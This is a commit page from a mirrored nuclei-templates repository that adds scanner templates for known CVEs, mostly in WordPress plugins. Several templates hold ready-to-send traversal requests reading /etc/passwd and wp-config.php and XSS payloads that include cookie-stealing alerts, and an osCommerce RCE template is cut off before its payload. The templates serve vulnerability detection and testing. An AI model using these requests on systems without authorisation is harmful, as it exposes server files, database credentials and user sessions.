daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #74 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-07-16 01:53:24 +05:30 committed by GitHub
parent 887e7bcfab 3668f4c582
commit 8895e4727c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
47 changed files with 1199 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 401 | vulnerabilities | 225 | exposed-panels | 197 |
| takeovers | 70 | exposures | 114 | technologies | 117 |
| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
| takeovers | 70 | exposures | 116 | technologies | 120 |
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
| default-logins | 37 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 18 |
**127 directories, 1505 files**.
**128 directories, 1551 files**.
</td>
</tr>

27
cves/2011/CVE-2011-1669.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-1669
info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
cves/2011/CVE-2011-4618.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-4618
info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-4624.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-4624
info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-4926.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-5106.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5106
info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-5107.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5107
info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-5179.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5179
info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-5181.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2011/CVE-2011-5265.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2011-5265
info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2012/CVE-2012-0901.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-0901
info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2012/CVE-2012-2371.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img/src=x onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2012/CVE-2012-4273.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-4273
info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2012/CVE-2012-4768.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2012/CVE-2012-5913.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2012-5913
info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<ScrIpT>alert(123)</ScrIpT>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2013/CVE-2013-4117.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2013-4117
info:
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2013/CVE-2013-4625.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2014/CVE-2014-4513.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

25
cves/2015/CVE-2015-1000012.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2015-1000012
info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference: |
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

25
cves/2015/CVE-2015-9480.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2015-9480
info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo
severity: high
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

25
cves/2016/CVE-2016-10956.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2016-10956
info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
tags: cve,cve2016,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
part: body
- type: status
status:
- 200

25
cves/2018/CVE-2018-9118.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2018-9118
info:
name: WP Background Takeover, Directory Traversal <= 4.1.4
author: 0x_Akoko
severity: high
description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
reference: https://www.exploit-db.com/exploits/44417
tags: wordpress,wp-plugin,lfi,cve,cve2018
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and

2
cves/2019/CVE-2019-17538.yaml
View File

@ -4,7 +4,7 @@ info:
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
tags: cve.cve2019,jnoj,lfi
tags: cve,cve2019,jnoj,lfi
requests:
- raw:

30
cves/2019/CVE-2019-19134.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2019-19134
info:
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
tags: cve,cve2019,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'foo"><svg//onload="alert(123)">'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2019/CVE-2019-9618.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
cves/2020/CVE-2020-12054.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-12054
info:
name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2020/CVE-2020-17362.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-17362
info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src onerror=alert(123)>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2021/CVE-2021-24298.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24298
info:
name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2021/CVE-2021-24320.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24320
info:
name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=(alert)(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2021/CVE-2021-24335.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24335
info:
name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(123);>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2021/CVE-2021-24389.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-24389
info:
name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24389
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>prompt(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

10
dns/dead-host-with-cname.yaml
View File

@ -1,8 +1,8 @@
id: dead-host-with-cname
info:
name: dead-host-with-cname
author: pdteam
name: Detect Dangling cnames
author: pdteam,nytr0gen
severity: info
tags: dns
@ -21,3 +21,9 @@ dns:
- type: word
words:
- "IN\tCNAME"
extractors:
- type: regex
group: 1
regex:
- "IN\tCNAME\t(.+)"

29
exposures/configs/keycloak-openid-config.yaml Normal file
View File

@ -0,0 +1,29 @@
id: keycloak-openid-config
info:
name: Keycloak openid-config
author: rodnt
severity: info
reference: https://issues.jboss.org/browse/KEYCLOAK-571
tags: keycloak,config
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/openid-configuration"
- "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'issuer'
- 'authorization_endpoint'
- 'token_endpoint'
- 'userinfo_endpoint'
- 'jwks_uri'
condition: and

27
exposures/logs/exposed-glances-api.yaml Normal file
View File

@ -0,0 +1,27 @@
id: exposed-glances-api
info:
name: Exposed Glances API
author: princechaddha
severity: low
description: Glances is a cross-platform system monitoring tool written in Python.
reference: https://nicolargo.github.io/glances/
tags: glances,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'title">Glances</title>'
- 'glances.config'
- '<glances></glances>'
part: body
condition: and

8
iot/selea-ip-camera.yaml
View File

@ -2,9 +2,10 @@ id: selea-ip-camera
info:
name: Detect Selea Targa IP OCR-ANPR Camera
author: geeknik
description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
description: Various version of the Selea Targa IP OCR-ANPR Camera are vulnerable to an Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure flaw
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
severity: info
tags: iot
tags: iot,selea,targa
requests:
- method: GET
@ -17,6 +18,9 @@ requests:
part: header
words:
- "SeleaCPSHttpServer"
- "selea_httpd"
- "HttpServer/0.1"
condition: or
- type: word
part: body
words:

19
network/printers-info-leak.yaml Normal file
View File

@ -0,0 +1,19 @@
id: printers-info-leak
info:
name: Unauthorized Printer Access
author: pussycat0x
severity: info
tags: network,iot
reference: https://book.hacktricks.xyz/pentesting/9100-pjl
network:
- inputs:
- data: "@PJL INFO STATUS\n"
host:
- "{{Hostname}}:9100"
matchers:
- type: word
words:
- "CODE="
- "PJL INFO STATUS"
condition: and

0
technologies/microsoft-echange-server-detect.yaml → technologies/microsoft-exchange-server-detect.yaml
View File

12
vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
View File

@ -5,18 +5,26 @@ info:
author: madrobot
severity: medium
description: Cross-site scripting on Moodle.
reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
tags: moodle,xss
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '\"};alert(1337);//'
- "<script>alert('XSS')</script>"
part: body
- type: word
part: header
words:
- "text/html"

42
vulnerabilities/oscommerce/oscommerce-rce.yaml Normal file
View File

@ -0,0 +1,42 @@
id: oscommerce-rce
info:
author: Suman_Kar
name: osCommerce 2.3.4.1 - Remote Code Execution
description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
reference: https://www.exploit-db.com/exploits/50128
severity: high
tags: rce,oscommerce
requests:
- raw:
- |
POST /install/install.php?step=4 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 95
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: application/x-www-form-urlencoded
